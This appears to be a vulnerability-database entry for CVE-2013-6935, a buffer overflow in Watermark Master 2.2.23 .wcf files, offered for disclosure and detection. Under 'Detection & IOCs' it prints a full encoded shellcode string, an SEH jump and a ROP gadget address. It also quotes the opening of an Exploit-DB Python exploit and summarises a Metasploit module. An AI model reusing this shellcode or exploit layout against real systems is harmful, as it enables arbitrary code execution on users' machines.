CVE-2013-6935
published 2013-12-04CVE-2013-6935: Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows remote attackers to execute arbitrary code via a long string in the SourcePath value in…
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
32.35%
98.1th percentile
Buffer overflow in VideoCharge Software Watermark Master 2.2.23 allows remote attackers to execute arbitrary code via a long string in the SourcePath value in a .wcf file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| videocharge | watermark_master | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x06\x90\x90
bytes↗
0x02700fee : popad # jmp ebp
bytes↗
\xbb\x80\xa3\x02\xb2\xda\xcc\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\x33\x31\x5e\x12\x03\x5e\x12\x83\x6e\x5f\xe0\x47\x92\x48\x6c\xa7\x6a\x89\x0f\x21\x8f\xb8\x1d\x55\xc4\xe9\x91\x1d\x88\x01\x59\x73\x38\x91\x2f\x5c\x4f\x12\x85\xba\x7e\xa3\x2b\x03\x2c\x67\x2d\xff\x2e\xb4\x8d\x3e\xe1\xc9\xcc\x07\x1f\x21\x9c\xd0\x54\x90\x31\x54\x28\x29\x33\xba\x27\x11\x4b\xbf\xf7\xe6\xe1\xbe\x27\x56\x7d\x88\xdf\xdc\xd9\x29\xde\x31\x3a\x15\xa9\x3e\x89\xed\x28\x97\xc3\x0e\x1b\xd7\x88\x30\x94\xda\xd1\x75\x12\x05\xa4\x8d\x61\xb8\xbf\x55\x18\x66\x35\x48\xba\xed\xed\xa8\x3b\x21\x6b\x3a\x37\x8e\xff\x64\x5b\x11\xd3\x1e\x67\x9a\xd2\xf0\xee\xd8\xf0\xd4\xab\xbb\x99\x4d\x11\x6d\xa5\x8e\xfd\xd2\x03\xc4\xef\x07\x35\x87\x65\xd9\xb7\xbd\xc0\xd9\xc7\xbd\x62\xb2\xf6\x36\xed\xc5\x06\x9d\x4a\x39\x4d\xbc\xfa\xd2\x08\x54\xbf\xbe\xaa\x82\x83\xc6\x28\x27\x7b\x3d\x30\x42\x7e\x79\xf6\xbe\xf2\x12\x93\xc0\xa1\x13\xb6\xa2\x24\x80\x5a\x0b\xc3\x20\xf8\x53
- →The vulnerability is triggered by a long string in the SourcePath XML value within a .WCF file; monitor for .WCF files containing abnormally large SourcePath values (>516 bytes of padding before SEH overwrite). ↗
- →The SEH overwrite uses a short JMP (\xeb\x06\x90\x90) followed by a ROP gadget at address 0x02700fee (popad # jmp ebp); detection of this byte sequence at the SEH chain offset (~516 bytes into SourcePath value) is a strong indicator of exploitation. ↗
- →The exploit uses a NOP sled of 100 bytes (\x90 * 100) before the shellcode; scanning .WCF files for large NOP sleds embedded in XML attribute values can identify malicious files. ↗
- →The Metasploit module targets this vulnerability as a fileformat exploit for Windows; monitor for WatermarkMaster processes spawning unexpected child processes (e.g., calc.exe or cmd.exe) as a post-exploitation indicator. ↗
- ·The exploit was tested only on Windows XP SP3; the hardcoded ROP gadget address (0x02700fee) is module-specific and may not be valid on other OS versions or patch levels. ↗
- ·The shellcode uses msfencode with bad-char filter excluding \x00\x0a\x0d\x3c\x22\x26; any detection based on raw shellcode bytes must account for encoder polymorphism if a different encoder or key is used. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Watermark Master 2.2.23 - Local Buffer Overflow (SEH)
exploitdb·2013-11-01
CVE-2013-6935 Watermark Master 2.2.23 - Local Buffer Overflow (SEH)
Watermark Master 2.2.23 - Local Buffer Overflow (SEH)
---
#!/usr/bin/python
# Exploit Title:Watermark Master Buffer Overflow (SEH)
# Date found: 31.10.2013
# Exploit Author: metacom
# URL:http://www.videocharge.com/download.php
# Software Link:www.videocharge.com/download/WatermarkMaster_Install.exe
# Version: 2.2.23
# Vulnerable products:Watermark Master and Watermark Master + SDK
# Tested on: Windows XP SP3
# Poc video demo : http://bit.ly/19enbvN
from struct import pack
head=("\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30"
"\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D"
"\x31\x32\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D"
"\x22\x32\x2E\x32\x2E\x32\x33\x2E\x30\x30\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C
Metasploit
Watermark Master Buffer Overflow (SEH)
metasploit
Watermark Master Buffer Overflow (SEH)
Watermark Master Buffer Overflow (SEH)
This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when processing a specially crafted .WCF file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of Watermark Master to open a malicious .WCF file.
No writeups or analysis indexed.
2013-12-04
Published